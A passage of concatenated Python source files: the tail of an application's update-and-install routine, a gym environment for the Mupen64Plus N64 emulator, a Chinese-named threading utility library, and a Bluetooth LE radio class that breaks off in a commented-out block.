        # Fix: was a bare `except:` (also caught SystemExit/KeyboardInterrupt).
        # Update checking stays best-effort: failures are deliberately ignored.
        pass
    return
def backgroundDownload(cntlr, url):
    """Download the update file via the web cache, rename it to the final
    file name, and queue the install step on the UI thread."""
    filepathtmp = cntlr.webCache.getfilename(cntlr.updateURL, reload=True)
    # Fix: user-visible status message had a typo ("ompleted").
    cntlr.modelManager.showStatus(_("Download completed"), 5000)
    filepath = os.path.join(os.path.dirname(filepathtmp), os.path.basename(url))
    os.rename(filepathtmp, filepath)
    cntlr.uiThreadQueue.put((install, [cntlr,filepath]))
def install(cntlr,filepath):
    """Open the downloaded installer with the platform's default handler,
    then quit the application so the install can proceed."""
    import sys
    if sys.platform.startswith("win"):
        # Windows: let the shell launch the installer.
        os.startfile(filepath)
    else:
        if sys.platform in ("darwin", "macos"):
            command = 'open'
        else: # linux/unix
            command = 'xdg-open'
        try:
            import subprocess
            # list argv + shell=False avoids shell injection via the path
            subprocess.Popen([command,filepath])
        except Exception:
            # Fix: was a bare `except:`. Launching the installer remains
            # best-effort; we still quit below either way.
            pass
    cntlr.uiThreadQueue.put((cntlr.quit, []))
|
mupen64plus_env.py
|
import sys
PY3_OR_LATER = sys.version_info[0] >= 3
if PY3_OR_LATER:
# Python 3 specific definitions
from http.server import BaseHTTPRequestHandler, HTTPServer
else:
# Python 2 specific definitions
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import abc
import array
from contextlib import contextmanager
import inspect
import itertools
import json
import os
import subprocess
import threading
import time
from termcolor import cprint
import yaml
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
import mss
###############################################
class ImageHelper:
    """Small helper for reading pixel values out of a captured screen frame."""

    def GetPixelColor(self, image_array, x, y):
        """Return the (red, green, blue) tuple of the pixel at column x, row y.

        image_array is indexed [row][column]; any trailing channels (e.g. an
        alpha byte) are ignored.
        """
        pixel = image_array[y][x]
        return (pixel[0], pixel[1], pixel[2])
###############################################
### Variables & Constants ###
###############################################
# The width, height, and depth of the emulator window:
SCR_W = 640  # emulator window width in pixels
SCR_H = 480  # emulator window height in pixels
SCR_D = 3    # color depth: bytes per pixel (RGB)
MILLISECOND = 1.0 / 1000.0  # one millisecond in seconds, for polling sleeps
IMAGE_HELPER = ImageHelper()  # shared helper instance for pixel reads
###############################################
class Mupen64PlusEnv(gym.Env):
    """Abstract gym environment backed by a Mupen64Plus emulator process.

    Observations are raw RGB screen captures of the emulator window taken
    with mss; actions are N64 controller states served to the emulator's
    input driver over a local HTTP server (ControllerHTTPServer).
    Subclasses implement the game-specific hooks: _load_config,
    _validate_config, _navigate_menu, _get_reward, _evaluate_end_state.
    """
    __metaclass__ = abc.ABCMeta  # Python-2-style ABC declaration
    metadata = {'render.modes': ['human']}
    def __init__(self):
        # Starts the controller HTTP server, (optionally) Xvfb, and the
        # emulator process, then drives the game menus to the start point.
        self.viewer = None
        self.reset_count = 0
        self.step_count = 0
        self.running = True
        self.mss_grabber = None
        self.episode_over = False
        self.pixel_array = None
        self._base_load_config()
        self._base_validate_config()
        self.frame_skip = self.config['FRAME_SKIP']
        if self.frame_skip < 1:
            self.frame_skip = 1
        self.controller_server, self.controller_server_thread = self._start_controller_server()
        save_state = self._get_save_state()
        self.xvfb_process, self.emulator_process = \
            self._start_emulator(rom_name=self.config['ROM_NAME'],
                                 gfx_plugin=self.config['GFX_PLUGIN'],
                                 input_driver_path=self.config['INPUT_DRIVER_PATH'],
                                 save_state=save_state)
        # Menu navigation needs every frame, so frame skipping is disabled.
        with self.controller_server.frame_skip_disabled():
            self._navigate_menu()
        self.observation_space = \
            spaces.Box(low=0, high=255, shape=(SCR_H, SCR_W, SCR_D))
        self.action_space = spaces.MultiDiscrete([[-80, 80], # Joystick X-axis
                                                  [-80, 80], # Joystick Y-axis
                                                  [  0,  1], # A Button
                                                  [  0,  1], # B Button
                                                  [  0,  1], # RB Button
                                                  [  0,  1], # LB Button
                                                  [  0,  1], # Z Button
                                                  [  0,  1], # C Right Button
                                                  [  0,  1], # C Left Button
                                                  [  0,  1], # C Down Button
                                                  [  0,  1], # C Up Button
                                                  [  0,  1], # D-Pad Right Button
                                                  [  0,  1], # D-Pad Left Button
                                                  [  0,  1], # D-Pad Down Button
                                                  [  0,  1], # D-Pad Up Button
                                                  [  0,  1], # Start Button
                                                 ])
    def _get_save_state(self):
        # NOTE(review): if 'SAVE_STATE' is absent, config.get() yields None and
        # os.path.join raises TypeError — confirm config always sets this key.
        save_state = self.config.get('SAVE_STATE')
        return os.path.join(self._saves_dir(), save_state)
    def _saves_dir(self):
        # Path to ../saves, resolved relative to this source file's location.
        return os.path.join(os.path.dirname(inspect.stack()[0][1]), '../saves')
    def _base_load_config(self):
        """Load config.yml from next to this file, then let the subclass extend it."""
        self.config = yaml.safe_load(open(os.path.join(os.path.dirname(inspect.stack()[0][1]), "config.yml")))
        self._load_config()
    @abc.abstractmethod
    def _load_config(self):
        """Subclass hook: add or override game-specific configuration."""
        return
    def _base_validate_config(self):
        """Check the required config keys, then let the subclass validate its own."""
        if 'ROM_NAME' not in self.config:
            raise AssertionError('ROM_NAME configuration is required')
        if 'GFX_PLUGIN' not in self.config:
            raise AssertionError('GFX_PLUGIN configuration is required')
        self._validate_config()
    @abc.abstractmethod
    def _validate_config(self):
        """Subclass hook: validate game-specific configuration."""
        return
    def _step(self, action):
        """Apply one action, grab an observation, and return
        (observation, reward, episode_over, info)."""
        #cprint('Step %i: %s' % (self.step_count, action), 'green')
        self._act(action)
        obs = self._observe()
        self.episode_over = self._evaluate_end_state()
        reward = self._get_reward()
        self.step_count += 1
        return obs, reward, self.episode_over, {}
    def _act(self, action, count=1):
        # Send the same controller state `count` times to the input server.
        for _ in itertools.repeat(None, count):
            self.controller_server.send_controls(ControllerState(action))
    def _wait(self, count=1, wait_for='Unknown'):
        # Idle for `count` frames by sending NO_OP controls.
        # (`wait_for` is a human-readable label only; it is not used here.)
        self._act(ControllerState.NO_OP, count=count)
    def _press_button(self, button, times=1):
        # Press and release the given button `times` times.
        for _ in itertools.repeat(None, times):
            self._act(button) # Press
            self._act(ControllerState.NO_OP) # and release
    def _observe(self):
        """Capture the emulator window; returns an (SCR_H, SCR_W, 3) uint8 RGB array."""
        #cprint('Observe called!', 'yellow')
        if self.config['USE_XVFB']:
            # Under Xvfb the virtual screen starts at the origin.
            offset_x = 0
            offset_y = 0
        else:
            offset_x = self.config['OFFSET_X']
            offset_y = self.config['OFFSET_Y']
        image_array = \
            np.array(self.mss_grabber.grab({"top": offset_y,
                                            "left": offset_x,
                                            "width": SCR_W,
                                            "height": SCR_H}),
                     dtype=np.uint8)
        # drop the alpha channel and flip red and blue channels (BGRA -> RGB)
        self.pixel_array = np.flip(image_array[:, :, :3], 2)
        return self.pixel_array
    @abc.abstractmethod
    def _navigate_menu(self):
        """Subclass hook: drive the game's menus to the episode start point."""
        return
    @abc.abstractmethod
    def _get_reward(self):
        """Subclass hook: compute the reward for the current frame."""
        #cprint('Get Reward called!', 'yellow')
        return 0
    @abc.abstractmethod
    def _evaluate_end_state(self):
        """Subclass hook: return True when the episode has ended."""
        #cprint('Evaluate End State called!', 'yellow')
        return False
    @abc.abstractmethod
    def _reset(self):
        """Subclass hook: reset counters and return a fresh observation."""
        cprint('Reset called!', 'yellow')
        self.reset_count += 1
        self.step_count = 0
        return self._observe()
    def _render(self, mode='human', close=False):
        # Standard gym rendering: return the frame for 'rgb_array', or show
        # it in a SimpleImageViewer window for 'human'.
        if close:
            if hasattr(self, 'viewer') and self.viewer is not None:
                self.viewer.close()
                self.viewer = None
            return
        img = self.pixel_array
        if mode == 'rgb_array':
            return img
        elif mode == 'human':
            if not hasattr(self, 'viewer') or self.viewer is None:
                # Imported lazily: requires a display, so only load on demand.
                from gym.envs.classic_control import rendering
                self.viewer = rendering.SimpleImageViewer()
            self.viewer.imshow(img)
    def _close(self):
        """Stop the emulator process and the controller HTTP server."""
        cprint('Close called!', 'yellow')
        self.running = False
        self._kill_emulator()
        self._stop_controller_server()
    def _start_controller_server(self):
        """Start the HTTP server that the emulator's input driver polls for
        controller states; returns (server, server_thread)."""
        server = ControllerHTTPServer(server_address = ('', self.config['PORT_NUMBER']),
                                      control_timeout = self.config['ACTION_TIMEOUT'],
                                      frame_skip = self.frame_skip) # TODO: Environment argument (with issue #26)
        server_thread = threading.Thread(target=server.serve_forever, args=())
        server_thread.daemon = True
        server_thread.start()
        print('ControllerHTTPServer started on port ', self.config['PORT_NUMBER'])
        return server, server_thread
    def _stop_controller_server(self):
        #cprint('Stop Controller Server called!', 'yellow')
        if hasattr(self, 'controller_server'):
            self.controller_server.shutdown()
    def _start_emulator(self,
                        rom_name,
                        gfx_plugin,
                        input_driver_path,
                        res_w=SCR_W,
                        res_h=SCR_H,
                        res_d=SCR_D,
                        save_state=None):
        """Launch mupen64plus (optionally inside Xvfb + VirtualGL) and the
        emulator monitor thread; returns (xvfb_process, emulator_process).

        Raises Exception if the ROM, the input driver, or a free Xvfb
        display cannot be found.
        """
        rom_path = os.path.abspath(
            os.path.join(os.path.dirname(inspect.stack()[0][1]),
                         '../ROMs',
                         rom_name))
        if not os.path.isfile(rom_path):
            msg = "ROM not found: " + rom_path
            cprint(msg, 'red')
            raise Exception(msg)
        input_driver_path = os.path.abspath(os.path.expanduser(input_driver_path))
        if not os.path.isfile(input_driver_path):
            msg = "Input driver not found: " + input_driver_path
            cprint(msg, 'red')
            raise Exception(msg)
        cmd = [self.config['MUPEN_CMD'],
               "--nospeedlimit",
               "--nosaveoptions",
               "--resolution",
               "%ix%i" % (res_w, res_h),
               "--gfx", gfx_plugin,
               "--audio", "dummy",
               "--input", input_driver_path,
               rom_path]
        if save_state:
            # Insert before the trailing ROM path argument.
            cmd.insert(-1, '--savestate')
            cmd.insert(-1, save_state)
        initial_disp = os.environ["DISPLAY"]
        cprint('Initially on DISPLAY %s' % initial_disp, 'red')
        xvfb_proc = None
        if self.config['USE_XVFB']:
            display_num = -1
            success = False
            # If we couldn't find an open display number after 15 attempts, give up
            while not success and display_num <= 15:
                display_num += 1
                xvfb_cmd = [self.config['XVFB_CMD'],
                            ":" + str(display_num),
                            "-screen",
                            "0",
                            "%ix%ix%i" % (res_w, res_h, res_d * 8),
                            "-fbdir",
                            self.config['TMP_DIR']]
                cprint('Starting xvfb with command: %s' % xvfb_cmd, 'yellow')
                xvfb_proc = subprocess.Popen(xvfb_cmd, shell=False, stderr=subprocess.STDOUT)
                time.sleep(2) # Give xvfb a couple seconds to start up
                # Poll the process to see if it exited early
                # (most likely due to a server already active on the display_num)
                if xvfb_proc.poll() is None:
                    success = True
            print('') # new line
            if not success:
                msg = "Failed to initialize Xvfb!"
                cprint(msg, 'red')
                raise Exception(msg)
            os.environ["DISPLAY"] = ":" + str(display_num)
            cprint('Using DISPLAY %s' % os.environ["DISPLAY"], 'blue')
            cprint('Changed to DISPLAY %s' % os.environ["DISPLAY"], 'red')
            # Run the emulator through VirtualGL so GL rendering reaches Xvfb.
            cmd = [self.config['VGLRUN_CMD'], "-d", ":" + str(display_num)] + cmd
        cprint('Starting emulator with comand: %s' % cmd, 'yellow')
        emulator_process = subprocess.Popen(cmd,
                                            env=os.environ.copy(),
                                            shell=False,
                                            stderr=subprocess.STDOUT)
        # TODO: Test and cleanup:
        # May need to initialize this after the DISPLAY env var has been set
        # so it attaches to the correct X display; otherwise screenshots may
        # come from the wrong place. This used to be true when we were using
        # wxPython for screenshots. Untested after switching to mss.
        cprint('Calling mss.mss() with DISPLAY %s' % os.environ["DISPLAY"], 'red')
        self.mss_grabber = mss.mss()
        time.sleep(2) # Give mss a couple seconds to initialize; also may not be necessary
        # Restore the DISPLAY env var
        os.environ["DISPLAY"] = initial_disp
        cprint('Changed back to DISPLAY %s' % os.environ["DISPLAY"], 'red')
        emu_mon = EmulatorMonitor()
        monitor_thread = threading.Thread(target=emu_mon.monitor_emulator,
                                          args=[emulator_process])
        monitor_thread.daemon = True
        monitor_thread.start()
        return xvfb_proc, emulator_process
    def _kill_emulator(self):
        """Send a final NO_OP and terminate the emulator and Xvfb processes."""
        #cprint('Kill Emulator called!', 'yellow')
        try:
            self._act(ControllerState.NO_OP)
            if self.emulator_process is not None:
                self.emulator_process.kill()
            if self.xvfb_process is not None:
                self.xvfb_process.terminate()
        except AttributeError:
            pass # We may be shut down during intialization before these attributes have been set
###############################################
class EmulatorMonitor:
    """Watches a running emulator process and reports when it exits."""

    def monitor_emulator(self, emulator):
        """Poll the emulator process every 2 seconds until it terminates."""
        return_code = emulator.poll()
        while return_code is None:
            time.sleep(2)
            if emulator is None:
                print('Emulator reference is no longer valid. Shutting down?')
                return
            return_code = emulator.poll()
        # TODO: this means our environment died... need to die too
        print('Emulator closed with code: ' + str(return_code))
###############################################
class ControllerState(object):
    """One snapshot of every N64 controller input, JSON-serializable.

    The class constants below are ready-made control vectors in the order
    [JX, JY, A, B, RB, LB, Z, CR, CL, CD, CU, DR, DL, DD, DU, S].
    """
    # Controls        [ JX,  JY,  A,  B, RB, LB,  Z, CR, CL, CD, CU, DR, DL, DD, DU,  S]
    NO_OP           = [  0,   0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0]
    START_BUTTON    = [  0,   0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  1]
    A_BUTTON        = [  0,   0,  1,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0]
    B_BUTTON        = [  0,   0,  0,  1,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0]
    RB_BUTTON       = [  0,   0,  0,  0,  1,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0]
    CR_BUTTON       = [  0,   0,  0,  0,  0,  0,  0,  1,  0,  0,  0,  0,  0,  0,  0,  0]
    CL_BUTTON       = [  0,   0,  0,  0,  0,  0,  0,  0,  1,  0,  0,  0,  0,  0,  0,  0]
    CD_BUTTON       = [  0,   0,  0,  0,  0,  0,  0,  0,  0,  1,  0,  0,  0,  0,  0,  0]
    CU_BUTTON       = [  0,   0,  0,  0,  0,  0,  0,  0,  0,  0,  1,  0,  0,  0,  0,  0]
    JOYSTICK_UP     = [  0, 127,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0]
    JOYSTICK_DOWN   = [  0,-128,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0]
    JOYSTICK_LEFT   = [-128,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0]
    JOYSTICK_RIGHT  = [ 127,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0]

    # Attribute names in control-vector order; assignment order also fixes
    # the key order of __dict__ (and therefore of to_json()).
    _FIELDS = ("X_AXIS", "Y_AXIS", "A_BUTTON", "B_BUTTON", "R_TRIG", "L_TRIG",
               "Z_TRIG", "R_CBUTTON", "L_CBUTTON", "D_CBUTTON", "U_CBUTTON",
               "R_DPAD", "L_DPAD", "D_DPAD", "U_DPAD", "START_BUTTON")

    def __init__(self, controls=NO_OP):
        for index, field in enumerate(ControllerState._FIELDS):
            setattr(self, field, controls[index])

    def to_json(self):
        """Serialize the current control state as a JSON object string."""
        return json.dumps(self.__dict__)
###############################################
class ControllerHTTPServer(HTTPServer, object):
    """HTTP server that hands controller states to the emulator's input driver.

    The input driver polls with GET requests; send_controls() publishes one
    action, which is then served `frame_skip` times before the handler blocks
    again waiting for the next action. hold_response is the handshake flag:
    True means GET handlers must wait, False means the current action may be
    served.
    """
    def __init__(self, server_address, control_timeout, frame_skip):
        # NOTE(review): control_timeout is stored but currently unused — the
        # time-based bailout in send_controls is commented out.
        self.control_timeout = control_timeout
        self.controls = ControllerState()  # start from a NO_OP state
        self.hold_response = True
        self.running = True
        self.send_count = 0  # how many times the current action has been served
        self.frame_skip = frame_skip
        self.frame_skip_enabled = True
        self.TEXT_PLAIN_CONTENT_TYPE = "text/plain".encode()
        super(ControllerHTTPServer, self).__init__(server_address, self.ControllerRequestHandler)
    def send_controls(self, controls):
        """Publish one controller state and block until the handler thread
        has finished serving it (hold_response flips back to True)."""
        #print('Send controls called')
        self.send_count = 0
        self.controls = controls
        self.hold_response = False
        # Wait for controls to be sent:
        #start = time.time()
        while not self.hold_response: # and time.time() < start + self.control_timeout:
            time.sleep(MILLISECOND)
    def shutdown(self):
        # Unblocks any handler waiting on `running`, then stops and closes
        # the underlying HTTPServer.
        self.running = False
        super(ControllerHTTPServer, self).shutdown()
        super(ControllerHTTPServer, self).server_close()
    # http://preshing.com/20110920/the-python-with-statement-by-example/#implementing-the-context-manager-as-a-generator
    @contextmanager
    def frame_skip_disabled(self):
        """Context manager: temporarily serve every action exactly once."""
        self.frame_skip_enabled = False
        yield True
        self.frame_skip_enabled = True
    class ControllerRequestHandler(BaseHTTPRequestHandler, object):
        # Nested handler; reaches the owning server through self.server.
        def log_message(self, fmt, *args):
            # Silence per-request logging.
            pass
        def write_response(self, resp_code, resp_data):
            self.send_response(resp_code)
            self.send_header("Content-type", self.server.TEXT_PLAIN_CONTENT_TYPE)
            self.end_headers()
            self.wfile.write(resp_data.encode())
        def do_GET(self):
            # Busy-wait until an action is published (or the server stops).
            while self.server.running and self.server.hold_response:
                time.sleep(MILLISECOND)
            if not self.server.running:
                print('Sending SHUTDOWN response')
                # TODO: This sometimes fails with a broken pipe because
                # the emulator has already stopped. Should handle gracefully (Issue #4)
                self.write_response(500, "SHUTDOWN")
            # NOTE(review): there is no `return` after the SHUTDOWN branch, so
            # a second (200) response is written below — confirm intended.
            ### respond with controller output
            self.write_response(200, self.server.controls.to_json())
            self.server.send_count += 1
            # If we have sent the controls 'n' times, now we block until the next action is sent
            if self.server.send_count >= self.server.frame_skip or not self.server.frame_skip_enabled:
                self.server.hold_response = True
            return
###############################################
|
threadingUtil.py
|
"""
.. Hint::
线程操作有线程池
.. literalinclude:: ../../../pyefun/threadingUtil_test.py
:language: python
:caption: 代码示例
:linenos:
"""
from .public import *
import threading
from concurrent.futures import ThreadPoolExecutor
from threading import current_thread
@异常处理返回类型逻辑型
def 启动线程(函数名, 参数=(), 跟随主线程结束=False):
    "Start a thread running the given callable (args passed as a tuple) and return the Thread object. With daemon=False the main thread checks whether this child has finished before exiting."
    线程 = threading.Thread(target=函数名, args=参数, daemon=跟随主线程结束)
    线程.start()
    return 线程
class 互斥锁:
    'Mutex wrapper (like a single permit); non-reentrant, so acquiring twice from the same thread can deadlock.'
    def __init__(self):
        self.lock = threading.Lock()
    @异常处理返回类型逻辑型
    def 进入(self):
        # Acquire the lock, blocking until it is available.
        self.lock.acquire()
    @异常处理返回类型逻辑型
    def 退出(self):
        # Release the lock.
        self.lock.release()
class 递归锁:
    'Reentrant lock wrapper: an upgraded mutex that the owning thread may re-acquire without deadlocking itself.'
    def __init__(self):
        self.lock = threading.RLock()
    @异常处理返回类型逻辑型
    def 进入(self):
        # Acquire the reentrant lock (same thread may nest acquisitions).
        self.lock.acquire()
    @异常处理返回类型逻辑型
    def 退出(self):
        # Release one level of the reentrant lock.
        self.lock.release()
class 信号量:
    'Bounded semaphore wrapper: caps the number of threads running the guarded section at once.'
    def __init__(self, 数量=1):
        # 数量 = maximum number of concurrent holders.
        self.lock = threading.BoundedSemaphore(数量)
    @异常处理返回类型逻辑型
    def 进入(self):
        # Acquire one slot, blocking if the semaphore is exhausted.
        self.lock.acquire()
    @异常处理返回类型逻辑型
    def 退出(self):
        # Release one slot (BoundedSemaphore raises if over-released).
        self.lock.release()
class 事件锁:
    # Event wrapper: gate that waiting threads pass through when set.
    def __init__(self):
        self.lock = threading.Event()
    @异常处理返回类型逻辑型
    def 通行(self):
        # Set the event: waiting threads may proceed.
        self.lock.set()
    @异常处理返回类型逻辑型
    def 堵塞(self):
        # Clear the event: subsequent waits will block.
        self.lock.clear()
    @异常处理返回类型逻辑型
    def 等待(self):
        'Checks the event state: if set ("pass"), execution continues; otherwise blocks until the event is set.'
        self.lock.wait()
class 线程:
    """Convenience wrapper that starts threads and keeps track of every
    thread it started, so they can be joined and counted later."""
    def __init__(self):
        import threading as 线程
        self.__线程 = 线程
        self.__线程列表 = []  # every thread started through this instance
    @异常处理返回类型逻辑型
    def 启动线程(self, 函数名, 参数=(), 跟随主线程结束=False):
        "Start a thread running the given callable (args as a tuple) and return the Thread object. With daemon=False the main thread checks whether this child has finished before exiting."
        线程 = self.__线程.Thread(target=函数名, args=参数, daemon=跟随主线程结束)
        线程.start()
        self.__线程列表.append(线程)
        return 线程
    @异常处理返回类型逻辑型
    def 等待线程结束(self, 最长等待时间=0):
        'Join every tracked thread; returns True on completion. If the threads were started with daemon=True, a positive timeout bounds each join and the thread is abandoned afterwards.'
        for i in self.__线程列表:
            if 最长等待时间 <= 0:
                i.join()
            else:
                i.join(最长等待时间)
        return True
    @异常处理返回类型逻辑型
    def 取运行中的线程对象(self):
        # All currently alive threads in the process (threading.enumerate()).
        return self.__线程.enumerate()
    @异常处理返回类型逻辑型
    def 线程是否在运行(self, 线程对象):
        'Return True or False for the given thread object.'
        return 线程对象.is_alive()
    @异常处理返回类型逻辑型
    def 取运行的线程数(self):
        'Count only threads started through this instance that are still running.'
        # Bug fix: the original called list.remove() while iterating the same
        # list, which skips the element following each removal and can leave
        # dead threads in the count. Rebuild the list of live threads instead.
        self.__线程列表 = [x for x in self.__线程列表 if x.is_alive()]
        return len(self.__线程列表)
# 过时的库不用了
# import threadpool
# class 线程池(threadpool.ThreadPool):
# def __init__(self, 工作线程数量, 队列数量=0):
# """
# 创建线程池
# 工作线程数量 线程池的线程数量
# 队列数量 为投递任务时队列的数量
# """
# super().__init__(工作线程数量, q_size=队列数量, resq_size=0, poll_timeout=5)
#
# @异常处理返回类型逻辑型
# def 投递任务(self, 任务函数, 参数, 等待时间=None):
# """投递一个任务函数到线程池任务队列中。"""
# requests = threadpool.makeRequests(任务函数, [参数])
# for req in requests:
# self.putRequest(req, True, 等待时间)
#
# def 等待(self):
# """等待所有任务完成"""
# self.wait()
def 线程_取活动对象数():
    """
    Return the number of currently active Thread objects; equals the length
    of the list returned by 线程_取所有活动对象().
    """
    return threading.active_count()
def 线程_取当前线程():
    """
    Return the Thread object for the caller's thread of control. If the
    caller's thread was not created through the threading module, a dummy
    thread object with limited functionality is returned.
    """
    return threading.current_thread()
def 线程_取线程标识符():
    """
    Return the current thread's "thread identifier": a non-zero integer with
    no direct meaning, intended as a magic cookie (e.g. to index a dict of
    thread-specific data). Identifiers may be recycled after a thread exits
    and another is created.
    """
    return threading.get_ident()
def 线程_取所有活动对象():
    """
    Return a list of all currently active Thread objects, including daemon
    threads, dummy threads created by current_thread(), and the main thread.
    Terminated threads and threads not yet started are excluded.
    """
    return threading.enumerate()
def 线程_取主线程():
    """
    Return the main Thread object. Under normal conditions this is the
    thread the Python interpreter was started from.
    """
    return threading.main_thread()
def 取当前线程名称():
    """Return the name of the thread this function is called from."""
    当前线程 = current_thread()
    return 当前线程.name
class 线程池(ThreadPoolExecutor):
    """
    Thread-pool wrapper around concurrent.futures.ThreadPoolExecutor.

    When there is a large number of concurrent tasks, creating and
    destroying a thread per task wastes resources and degrades throughput;
    a pool amortizes the thread creation/teardown cost.

    Usage:
        def 线程初始化(data):
            print("init", data, 取当前线程名称())
        互斥锁 = 互斥锁()
        def 任务函数(i):
            time.sleep(1)
            互斥锁.进入()
            print(i)
            互斥锁.退出()
            return "result " + str(i)
        def 任务完成(future):
            print("current thread", 取当前线程名称())
            print("future", future.result())
        任务池 = 线程池(4, "pyefun", 线程初始化, [0])
        for url in range(10):
            future = 任务池.投递任务(任务函数, url)
            任务池.设置任务结束回调函数(future, 任务完成)
        任务池.等待()
    """
    def __init__(self, 最大线程数量, 线程名称前缀='',
                 线程初始化函数=None, 初始化函数参数=()):
        """
        Create the thread pool.
        :param 最大线程数量: maximum number of worker threads
        :param 线程名称前缀: prefix for worker thread names
        :param 线程初始化函数: callable run once in each worker at startup
        :param 初始化函数参数: arguments passed to the initializer
        """
        super().__init__(
            max_workers=最大线程数量,
            thread_name_prefix=线程名称前缀,
            initializer=线程初始化函数,
            initargs=初始化函数参数
        )
    def 投递任务(self, *任务函数, **传入参数):
        """
        Submit one task.
        :param 任务函数: the callable (followed by its positional arguments)
        :param 传入参数: keyword arguments for the callable
        :return: a Future object; a completion callback may be attached to it
        """
        # NOTE(review): the local name shadows concurrent.futures.Future.
        Future = self.submit(*任务函数, **传入参数)
        return Future
    def 设置任务结束回调函数(self, future, 回到函数):
        """
        Attach a completion callback to the Future returned by 投递任务.
        The callback receives the finished Future:
            def 回到函数(future):
                print("current thread", current_thread().name)
                print("result", future.result())
        """
        future.add_done_callback(回到函数)
    def 等待(self):
        # Block until all submitted tasks have completed (shutdown(True)).
        self.shutdown(True)
    def 批量投递任务(self, 任务函数, *任务参数数组, 超时=None, chunksize=1):
        """
        Submit tasks in bulk (no completion callback can be attached).
        :param 任务函数: the callable applied to each argument set
        :param 任务参数数组: iterables of arguments, as for Executor.map
        :param 超时: per-result timeout in seconds
        :param chunksize: batch size hint (only meaningful for process pools)
        :return: iterator over the results, in submission order
        """
        return self.map(任务函数, *任务参数数组, timeout=超时, chunksize=chunksize)
|
Bluetooth.py
|
from comlocal.util import Properties
import Radio
import json
import bluetooth
import bluetooth._bluetooth as _bt
import struct
import socket
import errno
import threading
import subprocess
import os
from ctypes import (CDLL, get_errno)
from ctypes.util import find_library
from socket import (
timeout,
socket,
AF_BLUETOOTH,
SOCK_RAW,
BTPROTO_HCI,
SOL_HCI,
HCI_FILTER,
)
import pdb
class Bluetooth (Radio.Radio):
    """
    Abstracts all communication over Bluetooth / BLE
    All communication is broadcast

    Receive path: a raw HCI socket filtered to LE advertising events.
    Send path: shells out to `hcitool` to set the advertising payload and
    briefly toggle advertising on and off.
    NOTE(review): byte handling (ord() over recv() data, '%X' per byte)
    is Python-2 style — confirm before running under Python 3.
    """
    def __init__ (self):
        super(Bluetooth, self).__init__(self._setupProperties())
        self._name = 'BT'
        btlib = find_library("bluetooth")
        if not btlib:
            raise Exception(
                "Can't find required bluetooth libraries"
                " (need to install bluez)"
            )
        # libbluetooth via ctypes for the scan-parameter ioctl.
        self._bluez = CDLL(btlib, use_errno=True)
        dev_id = self._bluez.hci_get_route(None)
        self._sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI)
        self._sock.bind((dev_id,))
        err = self._bluez.hci_le_set_scan_parameters(self._sock.fileno(), 0, 0x10, 0x10, 0, 0, 1000);
        if err < 0:
            raise Exception("Set scan parameters failed")
            # occurs when scanning is still enabled from previous call
        # allows LE advertising events
        hci_filter = struct.pack(
            "<IQH",
            0x00000010,
            0x4000000000000000,
            0
        )
        self._sock.setsockopt(SOL_HCI, HCI_FILTER, hci_filter)
        # Short timeout so read() is effectively non-blocking.
        self._sock.settimeout(.05)
        # self._port = 0x2807 #10247
        # self._sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
        # self._sock.settimeout(.05)
        # self._sock.bind(("", self._port))
        # self._sock.listen(5) #allow multiple connections
        # self._readQ = Queue.Queue()
        # self._readThread = threading.Thread(target=self._backgroundRead)
    #
    def __del__(self):
        # Best-effort cleanup of the raw HCI socket.
        self._sock.close()
    def start(self):
        """Enable LE advertising on hci0 (HCI LE Set Advertise Enable = 0x01)."""
        FNULL = open(os.devnull, 'w')
        onCmd = 'hcitool -i hci0 cmd 0x08 0x000C 0x01 0x00'
        try:
            subprocess.call(onCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
        except Exception as e:
            raise e
    def stop(self):
        """Disable LE advertising on hci0 (HCI LE Set Advertise Enable = 0x00)."""
        FNULL = open(os.devnull, 'w')
        offCmd = 'hcitool -i hci0 cmd 0x08 0x000C 0x00 0x00'
        try:
            subprocess.call(offCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
        except Exception as e:
            raise e
    def _setupProperties(self):
        """
        Set up the radio properties we might need
        """
        props = Properties.Properties()
        props.addr = self._getAddress()
        # 72 bytes: the usable payload of one advertising packet here.
        props.maxPacketLength = 72
        props.costPerByte = 1
        return props
    #
    def _getAddress(self):
        # Read the adapter's BD_ADDR via a raw HCI Read_BD_ADDR command,
        # returning it in the usual reversed, colon-separated form.
        get_byte = ord
        hci_sock = _bt.hci_open_dev(0)
        old_filter = hci_sock.getsockopt( _bt.SOL_HCI, _bt.HCI_FILTER, 14)
        flt = _bt.hci_filter_new()
        opcode = _bt.cmd_opcode_pack(_bt.OGF_INFO_PARAM,
                _bt.OCF_READ_BD_ADDR)
        _bt.hci_filter_set_ptype(flt, _bt.HCI_EVENT_PKT)
        _bt.hci_filter_set_event(flt, _bt.EVT_CMD_COMPLETE);
        _bt.hci_filter_set_opcode(flt, opcode)
        hci_sock.setsockopt( _bt.SOL_HCI, _bt.HCI_FILTER, flt )
        _bt.hci_send_cmd(hci_sock, _bt.OGF_INFO_PARAM, _bt.OCF_READ_BD_ADDR )
        pkt = hci_sock.recv(255)
        status,raw_bdaddr = struct.unpack("xxxxxxB6s", pkt)
        assert status == 0
        t = [ "%X" % get_byte(b) for b in raw_bdaddr ]
        t.reverse()
        bdaddr = ":".join(t)
        # restore old filter
        hci_sock.setsockopt( _bt.SOL_HCI, _bt.HCI_FILTER, old_filter )
        return bdaddr
    # def _backgroundRead(self):
    #   while self._threadRunning:
    #       client_sock = None
    #       try:
    #           #TODO: FIX THIS!!! THIS IS BLOCKING SO WE CAN NEVER END THIS SHIT
    #           client_sock,address = self._sock.accept()
    #           data = client_sock.recv(self.getProperties().maxPacketLength)
    #           tmp = json.loads(data)
    #           tmp['sentby'] = address[0] #want the address
    #           pdb.set_trace()
